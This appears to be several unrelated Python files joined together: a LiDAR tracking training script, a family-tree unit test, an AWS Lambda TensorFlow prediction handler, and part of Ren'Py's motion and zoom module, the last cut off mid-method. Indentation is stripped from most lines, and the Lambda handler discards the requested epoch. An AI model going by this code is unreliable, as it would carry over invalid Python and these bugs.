parser.add_argument('--learning_rate', type=float, default=0.001, help='learning rate at t=0')
parser.add_argument('--input_feature_num', type=int, default = 0, help='number of input point features')
parser.add_argument('--data_dir', type=str, default = '/home/zhuangyi/SiamVoxel/kitti/training/', help='dataset path')
parser.add_argument('--category_name', type=str, default = 'Car', help='Object to Track (Car/Pedestrian/Van/Cyclist)')
parser.add_argument('--save_root_dir', type=str, default='results', help='output folder')
parser.add_argument('--model', type=str, default = '', help='model name for training resume')
parser.add_argument('--optimizer', type=str, default = '', help='optimizer name for training resume')
opt = parser.parse_args()
print (opt)
#torch.cuda.set_device(opt.main_gpu)
os.environ["CUDA_VISIBLE_DEVICES"] = '0,1'
opt.manualSeed = 1
random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
save_dir = opt.save_root_dir
try:
os.makedirs(save_dir)
except OSError:
pass
logging.basicConfig(format='%(asctime)s %(message)s', datefmt='%Y/%m/%d %H:%M:%S', \
filename=os.path.join(save_dir, 'train.log'), level=logging.INFO)
logging.info('======================================================')
# 1. Load data
def tracking_collate(batch):
t_vox_feature = []
t_vox_number = []
t_vox_coordinate = []
s_vox_feature = []
s_vox_number = []
s_vox_coordinate = []
sample_box = []
for i, data in enumerate(batch):
t_vox_feature.append(data[0])
t_vox_number.append(data[1])
t_vox_coordinate.append(np.pad(data[2], ((0, 0), (1, 0)), mode = 'constant', constant_values = i))
s_vox_feature.append(data[3])
s_vox_number.append(data[4])
s_vox_coordinate.append(np.pad(data[5], ((0, 0), (1, 0)), mode = 'constant', constant_values = i))
sample_box.append(data[6])
return torch.from_numpy(np.concatenate(t_vox_feature, axis=0)).float(),\
torch.from_numpy(np.concatenate(t_vox_number, axis=0)).float(),\
torch.from_numpy(np.concatenate(t_vox_coordinate, axis=0)).float(),\
torch.from_numpy(np.concatenate(s_vox_feature, axis=0)).float(),\
torch.from_numpy(np.concatenate(s_vox_number, axis=0)).float(),\
torch.from_numpy(np.concatenate(s_vox_coordinate, axis=0)).float(),\
np.array(sample_box)
train_data = SiameseTrain(
input_size=1024,
path= opt.data_dir,
split='Train_tiny',
category_name=opt.category_name,
offset_BB=0,
scale_BB=1.25)
train_dataloader = torch.utils.data.DataLoader(
train_data,
batch_size=opt.batchSize,
shuffle=True,
num_workers=int(opt.workers),
collate_fn=tracking_collate,
pin_memory=True)
test_data = SiameseTrain(
input_size=1024,
path=opt.data_dir,
split='Valid_tiny',
category_name=opt.category_name,
offset_BB=0,
scale_BB=1.25)
test_dataloader = torch.utils.data.DataLoader(
test_data,
batch_size=int(opt.batchSize/2),
shuffle=False,
num_workers=int(opt.workers),
collate_fn=tracking_collate,
pin_memory=True)
print('#Train data:', len(train_data), '#Test data:', len(test_data))
print (opt)
# 2. Define model, loss and optimizer
model = SiamPillar()
if opt.ngpu > 1:
model = torch.nn.DataParallel(model, range(opt.ngpu))
if opt.model != '':
model.load_state_dict(torch.load(os.path.join(save_dir, opt.model)), strict=False)
model.cuda()
print(model)
optimizer = optim.Adam(model.parameters(), lr=opt.learning_rate, betas = (0.9, 0.999), eps=1e-08)
if opt.optimizer != '':
optimizer.load_state_dict(torch.load(os.path.join(save_dir, opt.optimizer)))
scheduler = lr_scheduler.StepLR(optimizer, step_size=12, gamma=0.2)
# 3. Training and testing
for epoch in range(opt.nepoch):
scheduler.step(epoch)
print('======>>>>> Online epoch: #%d, lr=%f <<<<<======' %(epoch, scheduler.get_lr()[0]))
# # 3.1 switch to train mode
torch.cuda.synchronize()
model.train()
train_mse = 0.0
timer = time.time()
batch_correct = 0.0
batch_cla_loss = 0.0
batch_reg_loss = 0.0
batch_cla_pos_loss = 0.0
batch_cla_neg_loss = 0.0
batch_label_loss = 0.0
batch_box_loss = 0.0
batch_num = 0.0
batch_iou = 0.0
batch_true_correct = 0.0
for i, data in enumerate(tqdm(train_dataloader, 0)):
if len(data[0]) == 1:
continue
torch.cuda.synchronize()
# 3.1.1 load inputs and targets
t_vox_feature, t_vox_number, t_vox_coordinate, \
s_vox_feature, s_vox_number, s_vox_coordinate, sample_box = data
t_vox_feature = Variable(t_vox_feature, requires_grad=False).cuda()
t_vox_number = Variable(t_vox_number, requires_grad=False).cuda()
t_vox_coordinate = Variable(t_vox_coordinate, requires_grad=False).cuda()
s_vox_feature = Variable(s_vox_feature, requires_grad=False).cuda()
s_vox_number = Variable(s_vox_number, requires_grad=False).cuda()
s_vox_coordinate = Variable(s_vox_coordinate, requires_grad=False).cuda()
anchors = cal_anchors() # [cfg.FEATURE_HEIGHT, cfg.FEATURE_WIDTH, 2, 7]; 2 means two rotations; 7 means (cx, cy, cz, h, w, l, r)
pos_equal_one, targets = cal_rpn_target(sample_box, [cfg.FEATURE_WIDTH, cfg.FEATURE_HEIGHT], anchors, coordinate='lidar')
pos_equal_one = torch.from_numpy(pos_equal_one).float()
targets = torch.from_numpy(targets).float()
pos_equal_one = Variable(pos_equal_one, requires_grad=False).cuda()
targets = Variable(targets, requires_grad=False).cuda()
# 3.1.2 compute output
optimizer.zero_grad()
pred_conf, pred_reg = model(len(sample_box), t_vox_feature, t_vox_number, t_vox_coordinate, \
s_vox_feature, s_vox_number, s_vox_coordinate)
cls_loss, pcls_loss, ncls_loss = focal_loss(pred_conf, pos_equal_one)
#cls_loss, pcls_loss, ncls_loss = rpn_cross_entropy_balance(pred_conf, pos_equal_one)
reg_loss = rpn_smoothL1(pred_reg, targets, pos_equal_one)
box_loss = box_iou3d(pred_reg, targets, anchors, pos_equal_one)
#loss_label = criterion_cla(pred_seed, label_cla)
#loss_box = criterion_box(pred_offset, label_reg)
#loss_box = (loss_box.mean(2) * label_cla).sum()/(label_cla.sum()+1e-06)
loss = cls_loss + 5 * reg_loss + 0.1 * box_loss
# 3.1.3 compute gradient and do SGD step
loss.backward()
optimizer.step()
torch.cuda.synchronize()
# 3.1.4 update training error
# estimation_cla_cpu = seed_pediction.sigmoid().detach().cpu().numpy()
# label_cla_cpu = label_cla.detach().cpu().numpy()
# correct = float(np.sum((estimation_cla_cpu[0:len(label_point_set),:] > 0.4) == label_cla_cpu[0:len(label_point_set),:])) / 169.0
# true_correct = float(np.sum((np.float32(estimation_cla_cpu[0:len(label_point_set),:] > 0.4) + label_cla_cpu[0:len(label_point_set),:]) == 2)/(np.sum(label_cla_cpu[0:len(label_point_set),:])))
train_mse = train_mse + loss.data*len(sample_box)
# batch_correct += correct
batch_cla_loss += cls_loss.data
batch_reg_loss += reg_loss.data
batch_cla_pos_loss += pcls_loss
batch_cla_neg_loss += ncls_loss
batch_box_loss += box_loss.data
# batch_num += len(label_point_set)
# batch_true_correct += true_correct
if (i+1)%20 == 0:
print('\n ---- batch: %03d ----' % (i+1))
print('cla_loss: %f, reg_loss: %f, cla_pos_loss: %f, cls_neg_loss: %f, box_loss: %f' %
(batch_cla_loss/20, batch_reg_loss/20, batch_cla_pos_loss/20, batch_cla_neg_loss/20, batch_box_loss/20))
# print('accuracy: %f' % (batch_correct / float(batch_num)))
# print('true accuracy: %f' % (batch_true_correct / 20))
batch_label_loss = 0.0
batch_cla_loss = 0.0
batch_reg_loss = 0.0
batch_cla_pos_loss = 0.0
batch_cla_neg_loss = 0.0
batch_box_loss = 0.0
batch_num = 0.0
batch_true_correct = 0.0
# time taken
train_mse = train_mse/len(train_data)
torch.cuda.synchronize()
timer = time.time() - timer
timer = timer / len(train_data)
print('==> time to learn 1 sample = %f (ms)' %(timer*1000))
torch.save(model.state_dict(), '%s/model_%d.pth' % (save_dir, epoch))
torch.save(optimizer.state_dict(), '%s/optimizer_%d.pth' % (save_dir, epoch))
# 3.2 switch to evaluate mode
torch.cuda.synchronize()
model.eval()
test_cla_loss = 0.0
test_reg_loss = 0.0
test_cla_pos_loss = 0.0
test_cla_neg_loss = 0.0
test_label_loss = 0.0
test_box_loss = 0.0
test_correct = 0.0
test_true_correct = 0.0
timer = time.time()
for i, data in enumerate(tqdm(test_dataloader, 0)):
torch.cuda.synchronize()
# 3.2.1 load inputs and targets
t_vox_feature, t_vox_number, t_vox_coordinate, \
s_vox_feature, s_vox_number, s_vox_coordinate, sample_box = data
t_vox_feature = Variable(t_vox_feature, requires_grad=False).cuda()
t_vox_number = Variable(t_vox_number, requires_grad=False).cuda()
t_vox_coordinate = Variable(t_vox_coordinate, requires_grad=False).cuda()
s_vox_feature = Variable(s_vox_feature, requires_grad=False).cuda()
s_vox_number = Variable(s_vox_number, requires_grad=False).cuda()
s_vox_coordinate = Variable(s_vox_coordinate, requires_grad=False).cuda()
anchors = cal_anchors() # [cfg.FEATURE_HEIGHT, cfg.FEATURE_WIDTH, 2, 7]; 2 means two rotations; 7 means (cx, cy, cz, h, w, l, r)
pos_equal_one, targets = cal_rpn_target(sample_box, [cfg.FEATURE_WIDTH, cfg.FEATURE_HEIGHT], anchors, coordinate='lidar')
pos_equal_one = torch.from_numpy(pos_equal_one).float()
targets = torch.from_numpy(targets).float()
pos_equal_one = Variable(pos_equal_one, requires_grad=False).cuda()
targets = Variable(targets, requires_grad=False).cuda()
# 3.2.2 compute output
pred_conf, pred_reg = model(len(sample_box), t_vox_feature, t_vox_number,
t_vox_coordinate, \
s_vox_feature, s_vox_number, s_vox_coordinate)
cls_loss, pcls_loss, ncls_loss = focal_loss(pred_conf, pos_equal_one)
#cls_loss, pcls_loss, ncls_loss = rpn_cross_entropy_balance(pred_conf, pos_equal_one)
reg_loss = rpn_smoothL1(pred_reg, targets, pos_equal_one)
box_loss = box_iou3d(pred_reg, targets, anchors, pos_equal_one)
#loss_label = criterion_cla(pred_seed, label_cla)
#loss_box = criterion_box(pred_offset, label_reg)
#loss_box = (loss_box.mean(2) * label_cla).sum() / (label_cla.sum() + 1e-06)
loss = cls_loss + 5 * reg_loss + 0.1 * box_loss
torch.cuda.synchronize()
test_cla_loss = test_cla_loss + cls_loss.data*len(sample_box)
test_reg_loss = test_reg_loss + reg_loss.data*len(sample_box)
test_cla_pos_loss = test_cla_pos_loss + pcls_loss.data*len(sample_box)
test_cla_neg_loss = test_cla_neg_loss + ncls_loss.data*len(sample_box)
test_box_loss = test_box_loss + box_loss.data*len(sample_box)
# estimation_cla_cpu = seed_pediction.sigmoid().detach().cpu().numpy()
# label_cla_cpu = label_cla.detach().cpu().numpy()
# correct = float(np.sum((estimation_cla_cpu[0:len(label_point_set),:] > 0.4) == label_cla_cpu[0:len(label_point_set),:])) / 169.0
# true_correct = float(np.sum((np.float32(estimation_cla_cpu[0:len(label_point_set),:] > 0.4) + label_cla_cpu[0:len(label_point_set),:]) == 2)/(np.sum(label_cla_cpu[0:len(label_point_set),:])))
# test_correct += correct
# test_true_correct += true_correct*len(label_point_set)
# time taken
torch.cuda.synchronize()
timer = time.time() - timer
timer = timer / len(test_data)
print('==> time to learn 1 sample = %f (ms)' %(timer*1000))
# print mse
test_cla_loss = test_cla_loss / len(test_data)
test_reg_loss = test_reg_loss / len(test_data)
test_cla_pos_loss = test_cla_pos_loss / len(test_data)
test_cla_neg_loss = test_cla_neg_loss / len(test_data)
test_label_loss = test_label_loss / len(test_data)
test_box_loss = test_box_loss / len(test_data)
print('cla_loss: %f, reg_loss: %f, box_loss: %f, #test_data = %d' %(test_cla_loss, test_reg_loss, test_box_loss, len(test_data)))
# test_correct = test_correct / len(test_data)
# print('mean-correct of 1 sample: %f, #test_data = %d' %(test_correct, len(test_data)))
# test_true_correct = test_true_correct / len(test_data)
# print('true correct of 1 sample: %f' %(test_true_correct))
# log
logging.info('Epoch#%d: train error=%e, test error=%e, %e, %e, lr = %f' %(epoch, train_mse, test_cla_loss, test_reg_loss, test_box_loss, scheduler.get_lr()[0]))
|
"""
Unittest for familytree.person module.
"""
from familytree.person import Person
class TestPerson:
def test_init_minimal(self):
p = Person(1, "Name")
assert p.id_ == 1
assert p.name == "Name"
        assert p.gender is None
        assert p.father_id is None
        assert p.mother_id is None
        assert p.birth_order is None
        assert p.spouse_id is None
def test_init_full(self):
p = Person(1, "Name", "F",
father_id=2, mother_id=3, birth_order=1,
spouse_id=4)
assert p.id_ == 1
assert p.name == "Name"
assert p.gender == "F"
assert p.father_id == 2
assert p.mother_id == 3
assert p.birth_order == 1
assert p.spouse_id == 4
|
try:
import unzip_requirements
except ImportError:
pass
import json
import os
import tarfile
import boto3
import tensorflow as tf
import numpy as np
import census_data
import logging
logger = logging.getLogger()
logger.setLevel(logging.WARNING)
FILE_DIR = '/tmp/'
BUCKET = os.environ['BUCKET']
def _easy_input_function(data_dict, batch_size=64):
"""
data_dict = {
'<csv_col_1>': ['<first_pred_value>', '<second_pred_value>']
'<csv_col_2>': ['<first_pred_value>', '<second_pred_value>']
...
}
"""
# Convert input data to numpy arrays
for col in data_dict:
col_ind = census_data._CSV_COLUMNS.index(col)
dtype = type(census_data._CSV_COLUMN_DEFAULTS[col_ind][0])
data_dict[col] = np.array(data_dict[col],
dtype=dtype)
    # Pop the label column if present; prediction inputs may not include it.
    labels = data_dict.pop('income_bracket', None)
    if labels is not None:
        ds = tf.data.Dataset.from_tensor_slices((data_dict, labels))
    else:
        ds = tf.data.Dataset.from_tensor_slices(data_dict)
    ds = ds.batch(batch_size)
    return ds
def _predict_point(predict_input_point, epoch_files):
"""
    Makes predictions for a single data point
"""
# Download model from S3 and extract
    boto3.Session().resource('s3').Bucket(BUCKET).download_file(
        os.path.join(epoch_files, 'model.tar.gz'),
        FILE_DIR + 'model.tar.gz')
tarfile.open(FILE_DIR+'model.tar.gz', 'r').extractall(FILE_DIR)
# Create feature columns
wide_cols, deep_cols = census_data.build_model_columns()
# Load model
classifier = tf.estimator.LinearClassifier(
feature_columns=wide_cols,
model_dir=FILE_DIR+'tmp/model_'+epoch_files+'/',
warm_start_from=FILE_DIR+'tmp/model_'+epoch_files+'/')
# Setup prediction
predict_iter = classifier.predict(
lambda:_easy_input_function(predict_input_point))
# Iterate over prediction and convert to lists
predictions = []
for prediction in predict_iter:
for key in prediction:
prediction[key] = prediction[key].tolist()
predictions.append(prediction)
logging.warning('predictions is %s', predictions)
return predictions
def inferHandler(event, context):
run_from_queue = False
try:
        # This path is executed when the lambda is invoked directly
body = json.loads(event.get('body'))
except:
        # This path is executed when the lambda is invoked through the lambda queue
run_from_queue = True
body = event
# Read in prediction data as dictionary
# Keys should match _CSV_COLUMNS, values should be lists
predict_input = body['input']
logging.warning('predict_input type is %s', type(predict_input))
logging.warning('predict_input is %s', predict_input)
# Read in epoch
epoch_files = body['epoch']
epoch_files = ''
logging.warning('run_from_queue is %s', run_from_queue)
predictions_batch = []
if isinstance(predict_input, list) and not run_from_queue:
# Direct call with many datapoints
for jj in range(len(predict_input)):
predict_input_point = predict_input[jj][0]
predictions = _predict_point(predict_input_point, epoch_files)
predictions_batch.append(predictions)
elif run_from_queue:
# Call from lambda queue
predict_input_point = predict_input[0]
if isinstance(predict_input_point, list):
predict_input_point = predict_input_point[0]
logging.warning('predict_input_point is %s', predict_input_point)
predictions = _predict_point(predict_input_point, epoch_files)
logging.warning('predictions is %s', predictions)
predictions_batch.append(predictions)
else:
# Direct call with one datapoint
predict_input_point = predict_input
predictions = _predict_point(predict_input_point, epoch_files)
predictions_batch.append(predictions)
if not run_from_queue:
logging.warning('Return from normal execution')
response = {
"statusCode": 200,
"body": json.dumps(predictions_batch,
default=lambda x: x.decode('utf-8'))
}
else:
logging.warning('Return from queue execution')
response = {
"statusCode": 200,
"body": json.dumps(predictions_batch,
default=lambda x: x.decode('utf-8'))
}
logging.warning('response is %s', response)
return response
|
# Copyright 2004-2019 Tom Rothamel <pytom@bishoujo.us>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# This file contains displayables that move, zoom, rotate, or otherwise
# transform displayables. (As well as displayables that support them.)
from __future__ import print_function
from renpy.display.transform import * # @UnusedWildImport
import math
import renpy.display
from renpy.display.render import render
from renpy.display.layout import Container
class Motion(Container):
"""
This is used to move a child displayable around the screen. It
works by supplying a time value to a user-supplied function,
which is in turn expected to return a pair giving the x and y
location of the upper-left-hand corner of the child, or a
4-tuple giving that and the xanchor and yanchor of the child.
The time value is a floating point number that ranges from 0 to
1. If repeat is True, then the motion repeats every period
    seconds. (Otherwise, it stops.) If bounce is true, the
time value varies from 0 to 1 to 0 again.
The function supplied needs to be pickleable, which means it needs
to be defined as a name in an init block. It cannot be a lambda or
anonymous inner function. If you can get away with using Pan or
Move, use them instead.
Please note that floats and ints are interpreted as for xpos and
ypos, with floats being considered fractions of the screen.
"""
def __init__(self, function, period, child=None, new_widget=None, old_widget=None, repeat=False, bounce=False, delay=None, anim_timebase=False, tag_start=None, time_warp=None, add_sizes=False, style='motion', **properties):
"""
@param child: The child displayable.
@param new_widget: If child is None, it is set to new_widget,
so that we can speak the transition protocol.
@param old_widget: Ignored, for compatibility with the transition protocol.
@param function: A function that takes a floating point value and returns
an xpos, ypos tuple.
@param period: The amount of time it takes to go through one cycle, in seconds.
@param repeat: Should we repeat after a period is up?
@param bounce: Should we bounce?
@param delay: How long this motion should take. If repeat is None, defaults to period.
@param anim_timebase: If True, use the animation timebase rather than the shown timebase.
@param time_warp: If not None, this is a function that takes a
fraction of the period (between 0.0 and 1.0), and returns a
new fraction of the period. Use this to warp time, applying
acceleration and deceleration to motions.
This can also be used as a transition. When used as a
transition, the motion is applied to the new_widget for delay
seconds.
"""
if child is None:
child = new_widget
if delay is None and not repeat:
delay = period
super(Motion, self).__init__(style=style, **properties)
if child is not None:
self.add(child)
self.function = function
self.period = period
self.repeat = repeat
self.bounce = bounce
self.delay = delay
self.anim_timebase = anim_timebase
self.time_warp = time_warp
self.add_sizes = add_sizes
self.position = None
def update_position(self, t, sizes):
if renpy.game.less_updates:
if self.delay:
t = self.delay
if self.repeat:
t = t % self.period
else:
t = self.period
elif self.delay and t >= self.delay:
t = self.delay
if self.repeat:
t = t % self.period
elif self.repeat:
t = t % self.period
renpy.display.render.redraw(self, 0)
else:
if t > self.period:
t = self.period
else:
renpy.display.render.redraw(self, 0)
if self.period > 0:
t /= self.period
else:
t = 1
if self.time_warp:
t = self.time_warp(t)
if self.bounce:
t = t * 2
if t > 1.0:
t = 2.0 - t
if self.add_sizes:
res = self.function(t, sizes)
else:
res = self.function(t)
res = tuple(res)
if len(res) == 2:
self.position = res + (self.style.xanchor or 0, self.style.yanchor or 0)
else:
self.position = res
def get_placement(self):
if self.position is None:
if self.add_sizes:
# Almost certainly gives the wrong placement, but there's nothing
# we can do.
return super(Motion, self).get_placement()
else:
self.update_position(0.0, None)
return self.position + (self.style.xoffset, self.style.yoffset, self.style.subpixel)
def render(self, width, height, st, at):
if self.anim_timebase:
t = at
else:
t = st
child = render(self.child, width, height, st, at)
cw, ch = child.get_size()
self.update_position(t, (width, height, cw, ch))
rv = renpy.display.render.Render(cw, ch)
rv.blit(child, (0, 0))
self.offsets = [ (0, 0) ]
return rv
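# Hedged sketch (not part of the original file): the kind of pickleable motion
# function the Motion docstring describes.  It takes the time fraction t in
# [0.0, 1.0] and returns an (xpos, ypos) pair, with floats read as fractions of
# the screen.  In a game it would be defined as a name in an init block.
def example_slide(t):
    # Slide from the left edge to 80% of the screen width, at 30% screen height.
    return (0.8 * t, 0.3)
# Motion(example_slide, 2.0, child=some_displayable, repeat=True) would then move
# the child along that path, repeating every two seconds (some_displayable being
# whatever displayable you want to move).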
class Interpolate(object):
anchors = {
'top' : 0.0,
'center' : 0.5,
'bottom' : 1.0,
'left' : 0.0,
'right' : 1.0,
}
def __init__(self, start, end):
if len(start) != len(end):
raise Exception("The start and end must have the same number of arguments.")
self.start = [ self.anchors.get(i, i) for i in start ]
self.end = [ self.anchors.get(i, i) for i in end ]
def __call__(self, t, sizes=(None, None, None, None)):
types = (renpy.atl.position,) * len(self.start)
return renpy.atl.interpolate(t, tuple(self.start), tuple(self.end), types)
def Pan(startpos, endpos, time, child=None, repeat=False, bounce=False,
anim_timebase=False, style='motion', time_warp=None, **properties):
"""
This is used to pan over a child displayable, which is almost
always an image. It works by interpolating the placement of the
upper-left corner of the screen, over time. It's only really
suitable for use with images that are larger than the screen,
and we don't do any cropping on the image.
@param startpos: The initial coordinates of the upper-left
corner of the screen, relative to the image.
@param endpos: The coordinates of the upper-left corner of the
screen, relative to the image, after time has elapsed.
@param time: The time it takes to pan from startpos to endpos.
@param child: The child displayable.
@param repeat: True if we should repeat this forever.
@param bounce: True if we should bounce from the start to the end
to the start.
@param anim_timebase: True if we use the animation timebase, False to use the
displayable timebase.
@param time_warp: If not None, this is a function that takes a
fraction of the period (between 0.0 and 1.0), and returns a
new fraction of the period. Use this to warp time, applying
acceleration and deceleration to motions.
This can be used as a transition. See Motion for details.
"""
x0, y0 = startpos
x1, y1 = endpos
return Motion(Interpolate((-x0, -y0), (-x1, -y1)),
time,
child,
repeat=repeat,
bounce=bounce,
style=style,
anim_timebase=anim_timebase,
time_warp=time_warp,
**properties)
def Move(startpos, endpos, time, child=None, repeat=False, bounce=False,
anim_timebase=False, style='motion', time_warp=None, **properties):
"""
This is used to pan over a child displayable relative to
the containing area. It works by interpolating the placement of the
    child, over time.
@param startpos: The initial coordinates of the child
relative to the containing area.
@param endpos: The coordinates of the child at the end of the
move.
@param time: The time it takes to move from startpos to endpos.
@param child: The child displayable.
@param repeat: True if we should repeat this forever.
@param bounce: True if we should bounce from the start to the end
to the start.
@param anim_timebase: True if we use the animation timebase, False to use the
displayable timebase.
@param time_warp: If not None, this is a function that takes a
fraction of the period (between 0.0 and 1.0), and returns a
new fraction of the period. Use this to warp time, applying
acceleration and deceleration to motions.
This can be used as a transition. See Motion for details.
"""
return Motion(Interpolate(startpos, endpos),
time,
child,
repeat=repeat,
bounce=bounce,
anim_timebase=anim_timebase,
style=style,
time_warp=time_warp,
**properties)
class Revolver(object):
def __init__(self, start, end, child, around=(0.5, 0.5), cor=(0.5, 0.5), pos=None):
self.start = start
self.end = end
self.around = around
self.cor = cor
self.pos = pos
self.child = child
def __call__(self, t, rect):
(w, h, cw, ch) = rect
# Converts a float to an integer in the given range, passes
# integers through unchanged.
def fti(x, r):
if x is None:
x = 0
if isinstance(x, float):
return int(x * r)
else:
return x
if self.pos is None:
pos = self.child.get_placement()
else:
pos = self.pos
xpos, ypos, xanchor, yanchor, _xoffset, _yoffset, _subpixel = pos
xpos = fti(xpos, w)
ypos = fti(ypos, h)
xanchor = fti(xanchor, cw)
yanchor = fti(yanchor, ch)
xaround, yaround = self.around
xaround = fti(xaround, w)
yaround = fti(yaround, h)
xcor, ycor = self.cor
xcor = fti(xcor, cw)
ycor = fti(ycor, ch)
angle = self.start + (self.end - self.start) * t
angle *= math.pi / 180
# The center of rotation, relative to the xaround.
x = xpos - xanchor + xcor - xaround
y = ypos - yanchor + ycor - yaround
# Rotate it.
nx = x * math.cos(angle) - y * math.sin(angle)
ny = x * math.sin(angle) + y * math.cos(angle)
# Project it back.
nx = nx - xcor + xaround
ny = ny - ycor + yaround
return (renpy.display.core.absolute(nx), renpy.display.core.absolute(ny), 0, 0)
def Revolve(start, end, time, child, around=(0.5, 0.5), cor=(0.5, 0.5), pos=None, **properties):
return Motion(Revolver(start, end, child, around=around, cor=cor, pos=pos),
time,
child,
add_sizes=True,
**properties)
def zoom_render(crend, x, y, w, h, zw, zh, bilinear):
"""
This creates a render that zooms its child.
`crend` - The render of the child.
`x`, `y`, `w`, `h` - A rectangle inside the child.
`zw`, `zh` - The size the rectangle is rendered to.
`bilinear` - Should we be rendering in bilinear mode?
"""
rv = renpy.display.render.Render(zw, zh)
if zw == 0 or zh == 0 or w == 0 or h == 0:
return rv
rv.forward = renpy.display.render.Matrix2D(w / zw, 0, 0, h / zh)
rv.reverse = renpy.display.render.Matrix2D(zw / w, 0, 0, zh / h)
rv.xclipping = True
rv.yclipping = True
rv.blit(crend, rv.reverse.transform(-x, -y))
return rv
class ZoomCommon(renpy.display.core.Displayable):
def __init__(self,
time, child,
end_identity=False,
after_child=None,
time_warp=None,
bilinear=True,
opaque=True,
anim_timebase=False,
repeat=False,
style='motion',
**properties):
"""
@param time: The amount of time it will take to
        interpolate from the start to the end rectangle.
@param child: The child displayable.
@param after_child: If present, a second child
widget. This displayable will be rendered after the zoom
completes. Use this to snap to a sharp displayable after
the zoom is done.
@param time_warp: If not None, this is a function that takes a
fraction of the period (between 0.0 and 1.0), and returns a
new fraction of the period. Use this to warp time, applying
acceleration and deceleration to motions.
"""
super(ZoomCommon, self).__init__(style=style, **properties)
child = renpy.easy.displayable(child)
self.time = time
self.child = child
self.repeat = repeat
if after_child:
self.after_child = renpy.easy.displayable(after_child)
else:
if end_identity:
self.after_child = child
else:
self.after_child = None
self.time_warp = time_warp
self.bilinear = bilinear
self.opaque = opaque
self.anim_timebase = anim_timebase
def visit(self):
return [ self.child, self.after_child ]
def render(self, width, height, st, at):
if self.anim_timebase:
t = at
else:
t = st
if self.time:
done = min(t / self.time, 1.0)
else:
done = 1.0
if self.repeat:
done = done % 1.0
if renpy.game.less_updates:
done = 1.0
self.done = done
if self.after_child and done == 1.0:
return renpy.display.render.render(self.after_child, width, height, st, at)
if self.time_warp:
done = self.time_warp(done)
rend = renpy.display.render.render(self.child, width, height, st, at)
rx, ry, rw, rh, zw, zh = self.zoom_rectangle(done, rend.width, rend.height)
if rx < 0 or ry < 0 or rx + rw > rend.width or ry + rh > rend.height:
raise Exception("Zoom rectangle %r falls outside of %dx%d parent surface." % ((rx, ry, rw, rh), rend.width, rend.height))
rv = zoom_render(rend, rx, ry, rw, rh, zw, zh, self.bilinear)
if self.done < 1.0:
renpy.display.render.redraw(self, 0)
return rv
def event(self, ev, x, y, st):
if not self.time:
done = 1.0
else:
done = min(st / self.time, 1.0)
if done == 1.0 and self.after_child:
return self.after_child.event(ev, x, y, st)
else:
return None
class Zoom(ZoomCommon):
def __init__(self, size, start, end, time, child, **properties):
end_identity = (end == (0.0, 0.0) + size)
super(Zoom, self).__init__(time, child, end_identity=end_identity, **properties)
self.size = size
self.start = start
self.end = end
def zoom_rectangle(self, done, width, height):
rx, ry, rw, rh = [ (a + (b - a) * done) for a, b in zip(self.start, self.end) ]
return rx, ry, rw, rh, self.size[0], self.size[1]
class FactorZoom(ZoomCommon):
def __init__(self, start, end, time, child, **properties):
end_identity = (end == 1.0)
super(FactorZoom, self).__init__(time, child, end_identity=end_identity, **properties)
self.start = start
self.end = end
def zoom_rectangle(self, done, width, height):
factor = self.start + (self.end - self.start) * done
return 0, 0, width, height, factor * width, factor * height
class SizeZoom(ZoomCommon):
def __init__(self, start, end, time, child, **properties):
end_identity = False
super(SizeZoom, self).__init__(time, child, end_identity=end_identity, **properties)
self.start = start
self.end = end
def zoom_rectangle(self, done, width, height):
sw, sh = self.start
ew, eh = self.end
zw = sw + (ew - sw) * done
zh = sh + (eh - sh) * done
return 0, 0, width, height, zw, zh
class RotoZoom(renpy.display.core.Displayable):
transform = None
def __init__(self,
rot_start,
rot_end,
rot_delay,
zoom_start,
zoom_end,
zoom_delay,
child,
rot_repeat=False,
zoom_repeat=False,
rot_bounce=False,
zoom_bounce=False,
rot_anim_timebase=False,
zoom_anim_timebase=False,
rot_time_warp=None,
zoom_time_warp=None,
opaque=False,
style='motion',
**properties):
super(RotoZoom, self).__init__(style=style, **properties)
self.rot_start = rot_start
self.rot_end = rot_end
self.rot_delay = rot_delay
self.zoom_start = zoom_start
self.zoom_end = zoom_end
self.zoom_delay = zoom_delay
self.child = renpy.easy.displayable(child)
self.rot_repeat = rot_repeat
self.zoom_repeat = zoom_repeat
self.rot_bounce = rot_bounce
self.zoom_bounce = zoom_bounce
self.rot_anim_timebase = rot_anim_timebase
self.zoom_anim_timebase = zoom_anim_timebase
self.rot_time_warp = rot_time_warp
self.zoom_time_warp = zoom_time_warp
self.opaque = opaque
def visit(self):
return [ self.child ]
def render(self, width, height, st, at):
if self.rot_anim_timebase:
rot_time = at
else:
rot_time = st
if self.zoom_anim_timebase:
zoom_time = at
else:
zoom_time = st
if self.rot_delay == 0:
rot_time = 1.0
else:
rot_time /= self.rot_delay
if self.zoom_delay == 0:
zoom_time = 1.0
else:
zoom_time /= self.zoom_delay
if self.rot_repeat:
rot_time %= 1.0
if self.zoom_repeat:
zoom_time %= 1.0
if self.rot_bounce:
rot_time *= 2
rot_time = min(rot_time, 2.0 - rot_time)
if self.zoom_bounce:
zoom_time *= 2
zoom_time = min(zoom_time, 2.0 - zoom_time)
if renpy.game.less_updates:
rot_time = 1.0
zoom_time = 1.0
rot_time = min(rot_time, 1.0)
zoom_time = min(zoom_time, 1.0)
if self.rot_time_warp:
rot_time = self.rot_time_warp(rot_time)
if self.zoom_time_warp:
zoom_time = self.zoom_time_warp(zoom_time)
angle = self.rot_start + (1.0 * self.rot_end - self.rot_start) * rot_time
zoom = self.zoom_start + (1.0 * self.zoom_end - self.zoom_start) * zoom_time
# angle = -angle * math.pi / 180
zoom = max(zoom, 0.001)
